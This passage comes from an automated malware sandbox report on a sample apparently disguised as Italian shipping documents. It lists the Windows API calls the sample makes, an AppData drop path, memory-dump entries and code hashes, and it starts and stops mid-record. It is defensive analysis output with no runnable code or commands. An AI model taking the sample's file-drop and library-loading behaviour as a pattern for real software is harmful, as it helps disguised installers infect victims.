                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,00000000,000000F0), ref: 00401672
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Premolder\Mokl, xrefs: 00401665
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Premolder\Mokl
                                                  • API String ID: 1892508949-3631966918
                                                  • Opcode ID: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                  • Instruction ID: af3d40abcb4b92d5c03464ca519eb5fb88e5f0cb8c812bf2788953b75bb9e179
                                                  • Opcode Fuzzy Hash: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                  • Instruction Fuzzy Hash: B911B231504514EBDF20AFA5CD4169F36A0EF14368B29493FE942B22F1D63E8981DA5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                  • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                  • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                  • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                  • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                  • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                  • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                  • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                  • Instruction ID: 77040aa306750b8c28c9decefed3201328e3be048babc7be2d350fd99aa9233c
                                                  • Opcode Fuzzy Hash: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                  • Instruction Fuzzy Hash: A3219F31904204EADF10AFA5CF89A9E7A71BF44359F30413BE105B91E5CBBD8982DA2D
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 73bc9f92909011ac1234a364c328917f4c094328828aa5ee9b6a62c60ef37f74
                                                  • Instruction ID: fde7ee3b690bf0a9f1400c3c006cad269c6ae989cb90eb9f0638982b81c2946e
                                                  • Opcode Fuzzy Hash: 73bc9f92909011ac1234a364c328917f4c094328828aa5ee9b6a62c60ef37f74
                                                  • Instruction Fuzzy Hash: B0017C71A04615ABEB149F94DE58BAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction ID: 0f6a82c9814b8130565900c4f77509fb73920235a48305220d01948b4924e2c4
                                                  • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction Fuzzy Hash: 31317170640219BBDB22DF59ED48A9E3FA8EB00359F10443BF904FA1D1D3788E519BA9
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: fd1f55a540221de83200365c4b3a84b925a12d486a747a095f062a278a71ea17
                                                  • Instruction ID: a1e8d7c51e2174fe69d0a38a45018fa5c8ecdbf0c3d6cccc33ed9d3604573096
                                                  • Opcode Fuzzy Hash: fd1f55a540221de83200365c4b3a84b925a12d486a747a095f062a278a71ea17
                                                  • Instruction Fuzzy Hash: 5A119E71A0421AEADF15DFA0DA589AEB7B4FF04348F20443FE402B62D0D3B88A45DB5D
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                  • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                  • GetLastError.KERNEL32 ref: 00405C46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                  • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                  • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                  • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                    • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                    • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                    • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
